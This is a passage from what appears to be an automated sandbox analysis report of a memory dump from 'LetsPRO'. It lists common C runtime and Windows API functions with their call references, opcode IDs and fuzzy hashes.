                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _callnewh$AllocHeap_errno
                                        • String ID:
                                        • API String ID: 3215684309-0
                                        • Opcode ID: d69e75f1ec3e37a2b168a9112885079b01320554548ec43265cf8597e2f691be
                                        • Instruction ID: cd31d1d3cb35b597878aa97daf69fc40f12d95b52074d532054fb9bbf8eb3fc1
                                        • Opcode Fuzzy Hash: d69e75f1ec3e37a2b168a9112885079b01320554548ec43265cf8597e2f691be
                                        • Instruction Fuzzy Hash: A301D2363447D1AEE7002EA9EC44B5E3768AF6336CF202039E9548AEC0DF74C8498660
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97881C Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(6C9788F8,00000010,6C928C5C,00000000,?,00000000,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C978830
                                        • _errno.MSVCR100(6C9788F8,00000010,6C928C5C,00000000,?,00000000,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C97884F
                                        • _invalid_parameter_noinfo.MSVCR100(6C9788F8,00000010,6C928C5C,00000000,?,00000000,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C97885A
                                        • _get_osfhandle.MSVCR100(?,6C9788F8,00000010,6C928C5C,00000000,?,00000000,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C978896
                                        • FlushFileBuffers.KERNEL32(00000000,6C9788F8,00000010,6C928C5C,00000000,?,00000000,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C97889D
                                        • GetLastError.KERNEL32(?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C9788A7
                                        • __doserrno.MSVCR100(?,?,?,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C9788BC
                                        • _errno.MSVCR100(6C9788F8,00000010,6C928C5C,00000000,?,00000000,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C9788C6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$BuffersErrorFileFlushLast__doserrno_get_osfhandle_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3018510309-0
                                        • Opcode ID: eafd9455e805ea866a7397d311fefd63becc5b9b7411fed1375319ee927f2d93
                                        • Instruction ID: 3279da44a5def94feae89eba7eb9c2e8e40e0e5cbfe86c68823addac52175ffb
                                        • Opcode Fuzzy Hash: eafd9455e805ea866a7397d311fefd63becc5b9b7411fed1375319ee927f2d93
                                        • Instruction Fuzzy Hash: 43118C71A026458FD7249FA4C8847ED7A74AF21328F10029AC431BBBD2CB78C5448BA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93F846 Relevance: 12.1, APIs: 8, Instructions: 55COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • InterlockedFlushSList.KERNEL32(?,?,?,?,6C93F2F2), ref: 6C93F854
                                          • Part of subcall function 6C93726E: ??_V@YAXPAX@Z.MSVCR100(?,?,?,6C9372E6), ref: 6C937284
                                          • Part of subcall function 6C93726E: ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,6C9372E6), ref: 6C93728C
                                          • Part of subcall function 6C93726E: ??3@YAXPAX@Z.MSVCR100(?,?,?,?,?,6C9372E6), ref: 6C937292
                                        • InterlockedFlushSList.KERNEL32(?,?,?,?,6C93F2F2), ref: 6C93F85F
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,6C93F2F2), ref: 6C93F88F
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C93F2F2), ref: 6C93F897
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C93F2F2), ref: 6C93F89D
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,6C93F2F2), ref: 6C93F8B5
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C93F2F2), ref: 6C93F8BB
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,6C93F2F2), ref: 6C93F8CC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ??3@$FlushInterlockedList
                                        • String ID:
                                        • API String ID: 681866488-0
                                        • Opcode ID: 7b428656edb00aeb3bc9b58baf74dbb727b1803421228dc02793c920ac963c49
                                        • Instruction ID: ec16e300c75a9da486db5cc05d5d05345465cc219259bc37b63984983d1dafeb
                                        • Opcode Fuzzy Hash: 7b428656edb00aeb3bc9b58baf74dbb727b1803421228dc02793c920ac963c49
                                        • Instruction Fuzzy Hash: 0211A531604204DBD710EF50C9C099EB7B9FFB521CB2020ADE84617B11CF70FE059A50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90072C Relevance: 12.0, APIs: 8, Instructions: 46threadCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(6C8F3238,?,6C90084A,6C998136), ref: 6C900730
                                        • __set_flsgetvalue.MSVCR100 ref: 6C90073E
                                          • Part of subcall function 6C900371: TlsGetValue.KERNEL32(?,6C900743), ref: 6C90037A
                                        • SetLastError.KERNEL32(00000000), ref: 6C900750
                                        • _calloc_crt.MSVCR100(00000001,00000214), ref: 6C9275F7
                                        • DecodePointer.KERNEL32(00000000), ref: 6C927615
                                        • _initptd.MSVCR100(00000000,00000000), ref: 6C927624
                                        • GetCurrentThreadId.KERNEL32 ref: 6C92762B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CurrentDecodePointerThreadValue__set_flsgetvalue_calloc_crt_initptd
                                        • String ID:
                                        • API String ID: 242762301-0
                                        • Opcode ID: 713f5665ee907bda5f38bb903e155f70d4c92acae2cd41e46396f835852cd6df
                                        • Instruction ID: ec02d60c69dd0402bb0ab90f237e658a5f2d0386964f70f559814c01e5fa7dc8
                                        • Opcode Fuzzy Hash: 713f5665ee907bda5f38bb903e155f70d4c92acae2cd41e46396f835852cd6df
                                        • Instruction Fuzzy Hash: 77F02D327056915BD7311BB8BC09E8E3AF59F53F75730012CF06892580DF24C8419AD4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C8F3FA0 Relevance: 10.7, APIs: 7, Instructions: 186COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __ctrlfp
                                        • String ID:
                                        • API String ID: 1574075368-0
                                        • Opcode ID: 866af8523a6c59a3427cad90b478569eb186f44c4b98cbf9eab8e97ce1484ee2
                                        • Instruction ID: 6283c938364c4751a33da7e0631586841766c5fe4e90fbc63cadfa79c060843d
                                        • Opcode Fuzzy Hash: 866af8523a6c59a3427cad90b478569eb186f44c4b98cbf9eab8e97ce1484ee2
                                        • Instruction Fuzzy Hash: EB514A30904B05E6DB216F39D5452AE7B74EFE2388F24CBAAF4C851550EF38C599C356
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90AF98 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _get_fmode.MSVCR100(?,00000000,?), ref: 6C90AFD5
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6C92F949
                                        • _invalid_parameter_noinfo.MSVCR100(6C90AF40,00000014,6C90AF77,?,?,?,?,?,00000001), ref: 6C92F954
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __invoke_watson_get_fmode_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4022944351-0
                                        • Opcode ID: 9d125d84825d7f8e03a80a1b632622b5893efd7a097b8b58a5cf9f591ef137b4
                                        • Instruction ID: da4ce9a3eb30368dc59ce1f7262ccf31f7c34a17287f17f054b51f75e6338f78
                                        • Opcode Fuzzy Hash: 9d125d84825d7f8e03a80a1b632622b5893efd7a097b8b58a5cf9f591ef137b4
                                        • Instruction Fuzzy Hash: 6551A271A4930ADAEB00CFA9C9457EE7AB8BB0131CF24412ED560A7E98D378C644CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C91148C Relevance: 10.6, APIs: 7, Instructions: 148COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_fileno_invalid_parameter_noinfo_lseek
                                        • String ID:
                                        • API String ID: 1667283477-0
                                        • Opcode ID: ee3a72e02e5f0a3dc69c9d6b18377bf3fd024105c0de921c381749ba3e241e41
                                        • Instruction ID: 3635e29b8c19bc36ced0f77ff8c7dacb169dbc1d5a17f4cc0e6003f0e3e03c13
                                        • Opcode Fuzzy Hash: ee3a72e02e5f0a3dc69c9d6b18377bf3fd024105c0de921c381749ba3e241e41
                                        • Instruction Fuzzy Hash: 23512331A1860DEFDB119F68C88678C7BB5BF13318F248269D9259BE84D730E941CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90DC47 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 140COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Name::operator=operator+
                                        • String ID: std::nullptr_t$volatile
                                        • API String ID: 1352385710-3726895890
                                        • Opcode ID: 4e821caceec8c4708de2b91c2341698b44cbae630ad3d13cbd17f2bbfa704deb
                                        • Instruction ID: 72ca3ae860e1f733f0b0e40f6e0f95d7d12c90d55cf25e7982a524c209fdfcc6
                                        • Opcode Fuzzy Hash: 4e821caceec8c4708de2b91c2341698b44cbae630ad3d13cbd17f2bbfa704deb
                                        • Instruction Fuzzy Hash: 2441C032A59118EBCF00CFA8C8849ED7BB8FF26749F90406EE485A7E55D730D645CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9734B5 Relevance: 10.6, APIs: 7, Instructions: 126COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(?), ref: 6C9734D9
                                        • _errno.MSVCR100(?,?,?), ref: 6C9735FA
                                        • _errno.MSVCR100(?,?,?), ref: 6C973607
                                        • _invalid_parameter_noinfo.MSVCR100(?), ref: 6C9734E4
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100(?,?), ref: 6C973502
                                        • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6C97350D
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?), ref: 6C973612
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo$_invalid_parameter
                                        • String ID:
                                        • API String ID: 113182947-0
                                        • Opcode ID: c308eac2abfa5cac126a4b1b87dd3a740d5e40e25ca17cb0d0550d67952b7428
                                        • Instruction ID: 21316727ce5d2fdd258b1fe05c300ba74dd66009b5548ccefcb083e65106bf3c
                                        • Opcode Fuzzy Hash: c308eac2abfa5cac126a4b1b87dd3a740d5e40e25ca17cb0d0550d67952b7428
                                        • Instruction Fuzzy Hash: AC416B71A12249EBDF21CFB8C445BEE7BF8BF14318F144169D814AB690E735DA44CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C961A37 Relevance: 10.6, APIs: 7, Instructions: 116stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strstr.MSVCR100(00000000,?,?), ref: 6C961A59
                                        • _errno.MSVCR100(?), ref: 6C961A7A
                                        • _invalid_parameter_noinfo.MSVCR100(?), ref: 6C961A85
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfostrstr
                                        • String ID:
                                        • API String ID: 18508804-0
                                        • Opcode ID: bdf3327f0f6d17bd5a1ba6c60f4c60ac56cc9636afa8c310c3dfdbcf7b6cbad7
                                        • Instruction ID: 66ff3aee6949d455e297856f30c60cc699b776c6366539dc31e3f861837c83e1
                                        • Opcode Fuzzy Hash: bdf3327f0f6d17bd5a1ba6c60f4c60ac56cc9636afa8c310c3dfdbcf7b6cbad7
                                        • Instruction Fuzzy Hash: 7641A131A05289AFFB128B76C44079D7BB4AF0336CF288289D4B05BDE9E774D586C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C947AB0 Relevance: 10.6, APIs: 7, Instructions: 104synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32 ref: 6C947AED
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C947B05
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C947B13
                                        • GetLastError.KERNEL32(?,6C9A0D48,00000000), ref: 6C947B2E
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C947B46
                                        • SetEvent.KERNEL32(?), ref: 6C947B86
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C947BB8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLast$EventExceptionObjectSingleThrowWait
                                        • String ID:
                                        • API String ID: 3912761622-0
                                        • Opcode ID: 27834d47dc7da02b0548ad6fa50d30769ef3a7d5dc9b5ccbac0ce4a6097cafb8
                                        • Instruction ID: 020b432969ec44c00e385b41885d9566df1f5490155a0a90656d8e5f99b7010a
                                        • Opcode Fuzzy Hash: 27834d47dc7da02b0548ad6fa50d30769ef3a7d5dc9b5ccbac0ce4a6097cafb8
                                        • Instruction Fuzzy Hash: EF31DAB2A00209EFDB14DFA4C980DAD77B8AF15358B21C979E111EBA50DB34EE48DB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C938858 Relevance: 10.6, APIs: 7, Instructions: 102threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C93885F
                                        • GetCurrentThread.KERNEL32 ref: 6C9388DE
                                        • _memset.LIBCMT(?,00000000,0000000C), ref: 6C938919
                                        • EnterCriticalSection.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,6C93D101,?,00000000), ref: 6C938947
                                        • LeaveCriticalSection.KERNEL32(00000000,?,00000000), ref: 6C938973
                                        • TlsGetValue.KERNEL32(?,?,00000024,6C942936,?,00000000,?,6C942B40,?,?,00000000,?,?,00000000,?), ref: 6C938995
                                        • TlsSetValue.KERNEL32(?,00000000,?,6C942B40,?,?,00000000,?,?,00000000,?), ref: 6C9389A0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSectionValue$CurrentEnterH_prolog3_LeaveThread_memset
                                        • String ID:
                                        • API String ID: 3390461318-0
                                        • Opcode ID: a7206d99860032e88f73f0bc8919586c655cb518ff3af224f78319f0f99184eb
                                        • Instruction ID: d028b9f02f6b5019f606b9cf86a6889f86a5dfeac9ad22022e41f4e35ebf406b
                                        • Opcode Fuzzy Hash: a7206d99860032e88f73f0bc8919586c655cb518ff3af224f78319f0f99184eb
                                        • Instruction Fuzzy Hash: D8418D75A00215CFCB18CF20C4C4A9ABBB5FF58308B0556AAEC06AF756DB34E846CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9808A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __fltout2.LIBCMT ref: 6C9808CB
                                          • Part of subcall function 6C97FF57: ___dtold.LIBCMT ref: 6C97FF7D
                                          • Part of subcall function 6C97FF57: _$I10_OUTPUT.LIBCMT(?,?,00000016,?,?,?,6C980296,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6C97FF98
                                          • Part of subcall function 6C97FF57: strcpy_s.MSVCR100(6C980296,?,?,?,?,00000016,?,?,?,6C980296,00000000,?,?,000000FF,00000016,?), ref: 6C97FFB8
                                        • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6C9808D7
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6C9808DE
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __fptostr.LIBCMT ref: 6C980916
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: I10____dtold__fltout2__fptostr_errno_invalid_parameter_invalid_parameter_noinfostrcpy_s
                                        • String ID: -
                                        • API String ID: 3041646763-2547889144
                                        • Opcode ID: 3c56d2152848d79be227317996870774b0d1b93dd2224351d8738de95f8b4bb8
                                        • Instruction ID: e0cece012f0a8aa12b76cb84a5d399fb7dd5fedd8cc1a7eef0c05e2bb295a741
                                        • Opcode Fuzzy Hash: 3c56d2152848d79be227317996870774b0d1b93dd2224351d8738de95f8b4bb8
                                        • Instruction Fuzzy Hash: 18312432A02149EBDF118F68CC40DEE7BB9EF19314F005A58F821A7690EB32D964CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C911B5F Relevance: 10.6, APIs: 7, Instructions: 82COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _strnicmp_l.MSVCR100(?,021F17E8,?,?,7FFFFFFF,00000000,00000000,?,021F17E8,?,?,?,?,?,?,?), ref: 6C911BB9
                                          • Part of subcall function 6C90FF82: _tolower_l.MSVCR100(00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6C90FFDE
                                          • Part of subcall function 6C90FF82: _tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6C90FFED
                                        • __crtCompareStringA.MSVCR100(?,?,00001001,?,?,021F17E8,?,00000005,7FFFFFFF,00000000,00000000,?,021F17E8,?,?), ref: 6C91633B
                                        • _errno.MSVCR100(00000000,00000000,?,021F17E8,?,?,?,?,?,?,?), ref: 6C92C4DF
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,021F17E8,?,?,?,?,?,?,?), ref: 6C92C4EA
                                        • _errno.MSVCR100(7FFFFFFF,00000000,00000000,?,021F17E8,?,?,?,?,?,?,?), ref: 6C92C505
                                        • _invalid_parameter_noinfo.MSVCR100(7FFFFFFF,00000000,00000000,?,021F17E8,?,?,?,?,?,?,?), ref: 6C92C510
                                        • _errno.MSVCR100(?,?,?,?,?,7FFFFFFF,00000000,00000000,?,021F17E8,?,?,?,?,?,?), ref: 6C92C517
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo_tolower_l$CompareString__crt_strnicmp_l
                                        • String ID:
                                        • API String ID: 1585791229-0
                                        • Opcode ID: b99c6b82717d2b4b93530562a736987443e171db6f848c009516974da0842363
                                        • Instruction ID: 92cf7747beb986e3a2e820e27dab299097c2ae615a789b95a16c7eee4e89393b
                                        • Opcode Fuzzy Hash: b99c6b82717d2b4b93530562a736987443e171db6f848c009516974da0842363
                                        • Instruction Fuzzy Hash: 5921F971915149EFEF11EFA8C8809FD3BB4BF11328B204299E0705B9E8DB31CA45D751
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90FF82 Relevance: 10.6, APIs: 7, Instructions: 81COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _tolower_l.MSVCR100(00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6C90FFDE
                                        • _tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6C90FFED
                                        • ___ascii_strnicmp.LIBCMT ref: 6C917726
                                        • _errno.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6C92C451
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6C92C45C
                                        • _errno.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6C92C478
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6C92C483
                                        Memory Dump Source
